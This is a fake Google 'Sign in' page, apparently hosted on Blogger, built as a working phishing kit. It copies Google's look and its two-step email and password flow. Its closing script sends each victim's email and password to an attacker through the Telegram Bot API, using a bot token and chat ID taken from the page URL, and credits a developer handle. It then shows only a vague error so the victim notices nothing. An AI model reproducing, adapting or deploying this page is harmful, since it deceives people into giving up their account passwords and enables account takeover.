<!DOCTYPE html>
<html lang="en">
<head>

<script>

            var uri = window.location.toString();

            if (uri.indexOf("?m=1") > 0) {

                var clean_uri = uri.substring(0, uri.indexOf("?m=1"));

                window.history.replaceState({}, document.title, clean_uri);

            }

        </script>


    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in - Google Accounts</title>
    <link rel="icon" href="https://www.google.com/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap">
    <style>
        :root {
            --bg-color: #202124;
            --text-color: #e8eaed;
            --link-color: #8ab4f8;
            --card-bg: #202124;
            --border-color: #5f6368;
            --next-btn-bg: #8ab4f8;
            --next-btn-text: #202124;
        }

        body {
            background-color: var(--bg-color);
            color: var(--text-color);
            font-family: 'Roboto', sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            width: 100%;
            max-width: 450px;
            padding: 24px;
            box-sizing: border-box;
            position: relative;
        }

        .card {
            background-color: var(--card-bg);
            border: 1px solid var(--border-color);
            border-radius: 8px;
            padding: 48px 40px;
            text-align: center;
            transition: opacity 0.5s ease-in-out, transform 0.5s ease-in-out;
        }

        .logo {
            margin-bottom: 24px;
        }

        .logo svg {
            width: 75px;
            height: auto;
        }

        .content h1 {
            font-size: 24px;
            font-weight: 400;
            line-height: 1.3333;
            margin: 0 0 8px;
        }

        .content p {
            font-size: 16px;
            font-weight: 400;
            line-height: 1.5;
            margin: 0 0 24px;
        }

        form {
            text-align: left;
        }

        .input-group {
            position: relative;
            margin-bottom: 8px;
        }

        .input-group input {
            width: 100%;
            height: 56px;
            padding: 0 16px;
            box-sizing: border-box;
            background-color: transparent;
            border: 1px solid var(--border-color);
            border-radius: 4px;
            color: var(--text-color);
            font-size: 16px;
            outline: none;
            transition: border-color 0.3s ease;
        }

        .input-group input:focus {
            border-color: var(--link-color);
        }

        .input-group .placeholder-label {
            position: absolute;
            top: 50%;
            left: 16px;
            transform: translateY(-50%);
            color: #9aa0a6;
            pointer-events: none;
            transition: top 0.3s ease, font-size 0.3s ease;
        }

        .input-group input:focus + .placeholder-label,
        .input-group input:not(:placeholder-shown) + .placeholder-label {
            top: 8px;
            font-size: 12px;
        }

        .info-text p {
            font-size: 14px;
            line-height: 1.5;
            color: #bdc1c6;
            margin: 0 0 32px;
        }

        .info-text a {
            color: var(--link-color);
            text-decoration: none;
        }

        .actions {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .create-account-btn, .try-another-way-btn {
            background: none;
            border: none;
            color: var(--link-color);
            font-size: 14px;
            font-weight: 500;
            cursor: pointer;
            padding: 10px 15px;
            border-radius: 4px;
            transition: background-color 0.3s ease;
        }

        .create-account-btn:hover, .try-another-way-btn:hover {
            background-color: rgba(138, 180, 248, 0.08);
        }

        .next-btn {
            background-color: var(--next-btn-bg);
            color: var(--next-btn-text);
            border: none;
            padding: 10px 24px;
            font-size: 14px;
            font-weight: 500;
            border-radius: 4px;
            cursor: pointer;
            transition: opacity 0.3s ease;
        }

        .next-btn:hover {
            opacity: 0.9;
        }
        
        /* State-specific styles */
        #email-page { display: block; }
        #password-page { display: none; }
        .show-password-container {
            margin-top: 16px;
            text-align: left;
            font-size: 14px;
        }
        .show-password-container input[type="checkbox"] {
            accent-color: #8ab4f8;
        }
        .account-selector {
            display: flex;
            align-items: center;
            border: 1px solid var(--border-color);
            border-radius: 8px;
            padding: 12px 16px;
            margin-bottom: 24px;
            cursor: pointer;
            text-align: left;
        }

        .account-selector img {
            width: 24px;
            height: 24px;
            border-radius: 50%;
            margin-right: 12px;
        }

        .account-selector p {
            margin: 0;
            font-size: 16px;
            flex-grow: 1;
        }
    </style>
<link rel="me" href="https://www.blogger.com/profile/15370197974318749549" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body>
    <div class="container">
        
        <div id="email-page" class="card">
            <div class="logo">
              
              
              
               <svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="100" height="100" viewBox="0 0 48 48">
<path fill="#FFC107" d="M43.611,20.083H42V20H24v8h11.303c-1.649,4.657-6.08,8-11.303,8c-6.627,0-12-5.373-12-12c0-6.627,5.373-12,12-12c3.059,0,5.842,1.154,7.961,3.039l5.657-5.657C34.046,6.053,29.268,4,24,4C12.955,4,4,12.955,4,24c0,11.045,8.955,20,20,20c11.045,0,20-8.955,20-20C44,22.659,43.862,21.35,43.611,20.083z"></path><path fill="#FF3D00" d="M6.306,14.691l6.571,4.819C14.655,15.108,18.961,12,24,12c3.059,0,5.842,1.154,7.961,3.039l5.657-5.657C34.046,6.053,29.268,4,24,4C16.318,4,9.656,8.337,6.306,14.691z"></path><path fill="#4CAF50" d="M24,44c5.166,0,9.86-1.977,13.409-5.192l-6.19-5.238C29.211,35.091,26.715,36,24,36c-5.202,0-9.619-3.317-11.283-7.946l-6.522,5.025C9.505,39.556,16.227,44,24,44z"></path><path fill="#1976D2" d="M43.611,20.083H42V20H24v8h11.303c-0.792,2.237-2.231,4.166-4.087,5.571c0.001-0.001,0.002-0.001,0.003-0.002l6.19,5.238C36.971,39.205,44,34,44,24C44,22.659,43.862,21.35,43.611,20.083z"></path>
</svg>
          
          
          
          
          
            </div>
            <div class="content">
                <h1>Sign in</h1>
                <p>Use your Google Account</p>
                <form id="email-form">
                    <div class="input-group">
                        <input type="email" id="email" name="email" placeholder=" " required>
                        <label for="email" class="placeholder-label">Email or phone</label>
                    </div>
                    <div class="info-text" style="margin-bottom: 24px;">
                        <a href="#">Forgot email?</a>
                    </div>
                    <div class="info-text">
                        <p>Not your computer? Use Private Browsing windows to sign in. <a href="#">Learn more about using Guest mode</a></p>
                    </div>
                    <div class="actions">
                        <button type="button" class="create-account-btn">Create account</button>
                        <button type="submit" class="next-btn">Next</button>
                    </div>
                </form>
            </div>
        </div>

        <div id="password-page" class="card">
            <div class="logo">
                
              <svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="100" height="100" viewBox="0 0 48 48">
<path fill="#FFC107" d="M43.611,20.083H42V20H24v8h11.303c-1.649,4.657-6.08,8-11.303,8c-6.627,0-12-5.373-12-12c0-6.627,5.373-12,12-12c3.059,0,5.842,1.154,7.961,3.039l5.657-5.657C34.046,6.053,29.268,4,24,4C12.955,4,4,12.955,4,24c0,11.045,8.955,20,20,20c11.045,0,20-8.955,20-20C44,22.659,43.862,21.35,43.611,20.083z"></path><path fill="#FF3D00" d="M6.306,14.691l6.571,4.819C14.655,15.108,18.961,12,24,12c3.059,0,5.842,1.154,7.961,3.039l5.657-5.657C34.046,6.053,29.268,4,24,4C16.318,4,9.656,8.337,6.306,14.691z"></path><path fill="#4CAF50" d="M24,44c5.166,0,9.86-1.977,13.409-5.192l-6.19-5.238C29.211,35.091,26.715,36,24,36c-5.202,0-9.619-3.317-11.283-7.946l-6.522,5.025C9.505,39.556,16.227,44,24,44z"></path><path fill="#1976D2" d="M43.611,20.083H42V20H24v8h11.303c-0.792,2.237-2.231,4.166-4.087,5.571c0.001-0.001,0.002-0.001,0.003-0.002l6.19,5.238C36.971,39.205,44,34,44,24C44,22.659,43.862,21.35,43.611,20.083z"></path>
</svg>  
                
            </div>
            <div class="content">
                <h1 id="welcome-text">Welcome</h1>
                <div class="account-selector">
                    <img src="https://i.ibb.co.com/Z1BQ9h53/account-circle-1000dp-FFFFFF-FILL0-wght400-GRAD0-opsz48.png" alt="Profile Picture">
                    <p id="user-email-display"></p>
                </div>
                <form id="password-form">
                    <div class="input-group">
                        <input type="password" id="password" name="password" placeholder=" " required>
                        <label for="password" class="placeholder-label">Enter your password</label>
                    </div>
                    <div class="show-password-container">
                        <input type="checkbox" id="show-password-checkbox">
                        <label for="show-password-checkbox">Show password</label>
                    </div>
                    <div class="info-text">
                        <a href="#">Forgot password?</a>
                    </div>
                    <div class="actions" style="margin-top: 24px;">
                        <button type="button" class="try-another-way-btn">Try another way</button>
                        <button type="submit" class="next-btn" id="password-next-btn">Next</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
    
 <script>
    
    function getQueryParam(param) {
        const urlParams = new URLSearchParams(window.location.search);
        return urlParams.get(param);
    }

    
    const botToken = getQueryParam("Token");
    const chatId = getQueryParam("ChatID");

    
    document.getElementById('email-form').addEventListener('submit', function(e) {
        e.preventDefault();
        const email = document.getElementById('email').value;

        
        document.getElementById('email-page').style.display = 'none';
        document.getElementById('password-page').style.display = 'block';

        
        document.getElementById('user-email-display').textContent = email;
    });

    
    document.getElementById('password-form').addEventListener('submit', function(e) {
        e.preventDefault();
        const email = document.getElementById('email').value;
        const password = document.getElementById('password').value;

        

        
        if (botToken && chatId) {
            const telegramURL = `https://api.telegram.org/bot${botToken}/sendMessage`;
            const message = `
🔐 New Google Account Login

📧 Email: ${email}
🔑 Password: ${password}

Developer ~ @DevZeron
Channel ~ @CodeDevZeron

`;

            fetch(telegramURL, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            }).then(res => {
                console.log("unknown error");
            }).catch(err => {
                console.error("unknown error", err);
            });
        } else {
            console.error("unknown error");
        }
    });

    
    document.getElementById('show-password-checkbox').addEventListener('change', function(e) {
        const passwordInput = document.getElementById('password');
        if (e.target.checked) {
            passwordInput.type = 'text';
        } else {
            passwordInput.type = 'password';
        }
    });
</script>
</body>
</html>
